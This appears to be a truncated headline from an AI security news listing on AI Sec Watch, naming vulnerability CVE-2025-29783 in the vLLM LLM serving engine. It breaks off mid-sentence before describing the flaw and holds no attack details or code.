CVE-2025-29783: vLLM is a high-throughput and memory-efficient inference and serving engine for LLMs. When vLLM is configured to use Moo | AI Sec Watch